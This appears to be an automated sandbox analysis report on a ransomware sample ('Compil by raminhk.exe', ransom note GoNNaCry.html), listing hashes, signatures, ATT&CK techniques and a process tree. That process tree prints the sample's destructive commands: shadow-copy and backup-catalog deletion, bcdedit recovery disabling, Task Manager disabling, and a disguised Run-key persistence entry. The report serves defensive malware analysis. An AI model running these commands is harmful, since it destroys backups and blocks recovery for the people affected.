Overview

overview

9

Static

static

8

Compil by raminhk.exe

windows7_x64

9

Compil by raminhk.exe

windows10_x64

9

Analysis

  • max time kernel
    145s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    07-05-2021 04:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Compil by raminhk.exe

  • Size

    11.7MB

  • MD5

    cae9a30235cd1be5aba8f2969ad82573

  • SHA1

    35a86c4eb38a60a22b102b2fb82b34e4126956d2

  • SHA256

    24fa69380258da421941c711036a3f0a834ec6eb7919d0a4992b05ea0c549807

  • SHA512

    2d50e3aed489f7e18bf076b056e2a5d66dd7cb235b3f0b5b5df96e89d3e7e31afa1d6ee9a37895717a700467b5c7516c9de5740ef990fdbdeb0efabb63ee0930

Score
9/10
evasionpersistenceransomware

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
    ransomwareevasion
  • Disables Task Manager via registry modification
    evasion
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Drops desktop.ini file(s) 26 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Compil by raminhk.exe
    "C:\Users\Admin\AppData\Local\Temp\Compil by raminhk.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1820
    • C:\Windows\system32\tasklist.exe
      tasklist /FO csv
      2⤵
      • Enumerates processes with tasklist
      • Suspicious use of AdjustPrivilegeToken
      PID:2028
    • C:\Windows\system32\cmd.exe
      cmd /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -q
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:384
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadow /all /quiet
        3⤵
          PID:1736
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:968
      • C:\Windows\system32\cmd.exe
        cmd /c bcdedit /set {default} recoveryenabled No cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures C:\Windows\System32\cmd.exe /C vssadmin.exe Delete Shadows /All Quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1376
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled No
          3⤵
          • Modifies boot configuration data using bcdedit
          PID:2036
      • C:\Windows\system32\cmd.exe
        cmd /c REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1684
        • C:\Windows\system32\reg.exe
          REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:1448
      • C:\Windows\system32\cmd.exe
        cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Security Update" /t REG_SZ /d "C:\Users\Admin\WindowsSecurityUpdate.exe /onboot" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1620
        • C:\Windows\system32\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Security Update" /t REG_SZ /d "C:\Users\Admin\WindowsSecurityUpdate.exe /onboot" /f
          3⤵
          • Adds Run key to start application
          • Modifies registry key
          PID:464
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:812
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:564
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x2e8
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:612
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\GoNNaCry.html
        1⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1472
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1472 CREDAT:275457 /prefetch:2
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:936

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      Defense Evasion

      File Deletion

      1
      T1107

      Modify Registry

      3
      T1112

      Credential Access

      Discovery

      Process Discovery

      1
      T1057

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Inhibit System Recovery

      2
      T1490

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\K353SR3F.txt
        MD5

        cbad2747b769c828cf0613a06e9b5d44

        SHA1

        c5d00e912f8100f552c11edef53a6d53153acd00

        SHA256

        c0ac15bb09761468ec0e06088953c89f53b19e446b4d13ce3d33cd9437e47f02

        SHA512

        10c6e5d9b2424819a7a394d112e955ee62b1f79803753f16432d6c76c4cdd496575d58cbc20e24343ee636e1820b9e120a539e539aa4eb2a1f26f698a1e8edce

        Download Submit
      • C:\Users\Admin\Desktop\GoNNaCry.html
        MD5

        45d6357c19ef6849597920bbe3a09cd1

        SHA1

        3b0b07ae7e49ccb144a95f435d4e4f2c5a943afe

        SHA256

        f37f3978b0e8f92f3825b1c2a4d61863c8039acfb1752bf5a3b73115e41644b1

        SHA512

        bcf3560714426edb826db665274b2c86fc54d7b205df2cfab88b277c3b7cfe9e849d4483cc220635e550b182166f73718ef6ac498837545665113bc0ad106b04

        Download Submit
      • memory/384-62-0x0000000000000000-mapping.dmp
        Download
      • memory/464-70-0x0000000000000000-mapping.dmp
        Download
      • memory/564-71-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/936-72-0x0000000000000000-mapping.dmp
        Download
      • memory/968-64-0x0000000000000000-mapping.dmp
        Download
      • memory/1376-65-0x0000000000000000-mapping.dmp
        Download
      • memory/1448-68-0x0000000000000000-mapping.dmp
        Download
      • memory/1620-69-0x0000000000000000-mapping.dmp
        Download
      • memory/1684-67-0x0000000000000000-mapping.dmp
        Download
      • memory/1736-63-0x0000000000000000-mapping.dmp
        Download
      • memory/1820-61-0x0000000077800000-0x0000000077802000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2028-60-0x0000000000000000-mapping.dmp
        Download
      • memory/2036-66-0x0000000000000000-mapping.dmp
        Download